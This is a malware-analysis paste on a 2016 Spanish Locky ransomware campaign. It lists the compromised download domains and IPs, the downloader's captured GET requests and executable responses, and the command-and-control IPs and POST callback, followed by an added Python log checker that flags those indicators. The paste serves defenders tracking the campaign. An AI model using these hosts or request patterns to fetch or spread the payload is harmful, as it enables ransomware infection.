MalwareMustDie

Locky May18th 2016

May 18th, 2016
#MalwareMustDie!!!

// Campaign malvertisement screenshot:

http://imgur.com/a/kXvah

// VirusTotal info:

1. VT https://www.virustotal.com/en/file/5d6d2e0323c8a6efcb3a0fad39b5b17536c62e4cf2877a9e16150a9eb46baecb/analysis/
2. VT https://www.virustotal.com/en/file/51d7bba70a9ae3635c5b9bd17b2d8cb8df90ba57c8c84769d1a8296395c74dc0/analysis/
3. VT https://www.virustotal.com/en/file/1909ac8a0f17789632250a2b605b0f9140d8756d02003a50f8a5c24d8b3e2315/analysis/
4. VT https://www.virustotal.com/en/file/a9be0d13d4632a17d6d4a6b3ab2acce0be969e1b2cdd6a64952290b5c30fb97f/analysis/
5. VT https://www.virustotal.com/en/file/f8fc4b8a5f0e84fcf0fe24609a419968fb2e3bdb005a1c669c4e1eecd6bbb0d7/analysis/

// Payload info

This is the Spain campaign of Locky.
The downloaders are fetching Locky from:

rproducciones.com has address 217.76.130.137
vonenidan.de has address 212.227.33.186
il.seroca.com has address 46.226.47.21
www.centroinfantilelmolino.com has address 217.76.156.98

// The IPs are mostly located in Germany, not Italy; only one is in Spain.

217.76.130.137 | llge328.servidoresdns.net. |8560 | 217.76.128.0/19 | ONEANDONE | DE | arsys.es | Arsys Internet S.L.
212.227.33.186 | hosting.web.de. |8560 | 212.227.0.0/16 | ONEANDONE | DE | 1and1.co.uk | 1&1 Internet AG
46.226.47.21 | pl03.azamedia.net. & vz03.azamedia.net. |15699 | 46.226.40.0/21 | AS_ADAM | ES | azalorea.com | Azalorea S.L.
217.76.156.98 | slgc573.piensasolutions.com. |8560 | 217.76.128.0/19 | ONEANDONE | DE | arsys.es | Arsys Internet S.L.

// PoC for the verdict is as follows:

1. VT https://www.virustotal.com/en/file/5d6d2e0323c8a6efcb3a0fad39b5b17536c62e4cf2877a9e16150a9eb46baecb/analysis/

DOMAIN: rproducciones.com

GET /987t5t7g HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
Host: rproducciones.com
Connection: Keep-Alive


2. VT https://www.virustotal.com/en/file/51d7bba70a9ae3635c5b9bd17b2d8cb8df90ba57c8c84769d1a8296395c74dc0/analysis/

DOMAIN: vonenidan.de

GET /987t5t7g HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
Host: vonenidan.de
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Wed, 18 May 2016 07:21:54 GMT
Server: Apache
Last-Modified: Mon, 16 May 2016 19:09:58 GMT
ETag: "a00008e2-58e00-532fa5ee0f256"
Accept-Ranges: bytes
Content-Length: 364032
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: application/x-dosexec

MZ.......

3. VT https://www.virustotal.com/en/file/1909ac8a0f17789632250a2b605b0f9140d8756d02003a50f8a5c24d8b3e2315/analysis/

HOSTNAME: il.seroca.com

GET /987t5t7g HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
Host: il.seroca.com
Connection: Keep-Alive

4. VT https://www.virustotal.com/en/file/a9be0d13d4632a17d6d4a6b3ab2acce0be969e1b2cdd6a64952290b5c30fb97f/analysis/

DOMAIN: centroinfantilelmolino.com

GET /987t5t7g HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
Host: www.centroinfantilelmolino.com
Connection: Keep-Alive

5. VT https://www.virustotal.com/en/file/f8fc4b8a5f0e84fcf0fe24609a419968fb2e3bdb005a1c669c4e1eecd6bbb0d7/analysis/

DOMAIN: vonenidan.de

GET /987t5t7g HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
Host: vonenidan.de
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Wed, 18 May 2016 07:11:25 GMT
Server: Apache
Last-Modified: Mon, 16 May 2016 19:09:58 GMT
ETag: "a00008e2-58e00-532fa5ee0f256"
Accept-Ranges: bytes
Content-Length: 364032
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: application/x-dosexec

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

// CNC callback

Method: POST HTTP/1.1
Path: /userinfo.php

// IP info:

149.202.109.202
188.127.231.124
176.53.21.105
217.12.199.151

// IP origin:

149.202.109.202 |  |16276 | 149.202.0.0/16 | OVH | FR | ovh.com | OVH SAS
188.127.231.124 |  |56694 | 188.127.231.0/24 | DHUB | RU | oversun.ru | Oversun Ltd
176.53.21.105 | . |197328 | 176.53.21.0/24 | INETLTD | TR | turkrdns.com | Radore Veri Merkezi Hizmetleri A.S.
217.12.199.151 | annakoval.itldc-customer.net. |15626 | 217.12.192.0/19 | ITLAS | UA | itl.net.ua | ITL Company
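
As an added example (not part of the MalwareMustDie paste), a small Python checker that applies the indicators above to proxy log lines: the downloader's GET /987t5t7g to the listed hosts with an application/x-dosexec response, and the later POST /userinfo.php to the CNC IPs. The tab-separated log format and the sample lines are constructed assumptions, not real traffic.

```python
import re
from typing import Optional

# Indicators taken from the paste above.
PAYLOAD_HOSTS = {"rproducciones.com", "vonenidan.de", "il.seroca.com",
                 "www.centroinfantilelmolino.com"}
PAYLOAD_PATH = "/987t5t7g"
C2_IPS = {"149.202.109.202", "188.127.231.124", "176.53.21.105", "217.12.199.151"}
C2_PATH = "/userinfo.php"
# The downloader's fixed User-Agent (MSIE 7.0 on Windows NT 6.1 with Trident/4.0).
DOWNLOADER_UA = re.compile(r"MSIE 7\.0; Windows NT 6\.1; Trident/4\.0")

# Assumed, constructed log format, one request per line, tab-separated:
# timestamp, client_ip, method, host, path, status, response content-type, user-agent
def classify(line: str) -> Optional[str]:
    """Return a verdict name for one proxy log line, or None if nothing matches."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 8:
        return None
    _ts, _client, method, host, path, _status, ctype, ua = fields
    # Stage 1: downloader fetching the Locky PE from a compromised host.
    # The random path alone is a weak signal; require a second indicator.
    if method == "GET" and path == PAYLOAD_PATH:
        if host in PAYLOAD_HOSTS or ctype == "application/x-dosexec" or DOWNLOADER_UA.search(ua):
            return "locky_payload_fetch"
    # Stage 2: the running payload posting to the CNC via POST /userinfo.php.
    if method == "POST" and path == C2_PATH and host in C2_IPS:
        return "locky_c2_callback"
    return None

def scan(lines):
    """Return (line_number, verdict, host) for every line that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict, line.split("\t")[3]))
    return hits

# Constructed sample traffic: benign fetch, payload fetch, CNC callback, benign POST.
SAMPLE_LOG = [
    "2016-05-18T07:21:50Z\t10.0.0.5\tGET\twww.example.com\t/index.html\t200\ttext/html\tMozilla/5.0 (Windows NT 10.0)",
    "2016-05-18T07:21:54Z\t10.0.0.5\tGET\tvonenidan.de\t/987t5t7g\t200\tapplication/x-dosexec\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2)",
    "2016-05-18T07:22:10Z\t10.0.0.5\tPOST\t149.202.109.202\t/userinfo.php\t200\ttext/html\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0)",
    "2016-05-18T07:22:30Z\t10.0.0.7\tPOST\twww.example.com\t/userinfo.php\t200\ttext/html\tMozilla/5.0 (Windows NT 10.0)",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The last sample line shows why the CNC rule keys on the destination IP as well as the path: /userinfo.php is a common filename and would otherwise flood the alert queue.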
  134.  
// DGA callback:

  150.  
---
MalwareMustDie, NPO - the team.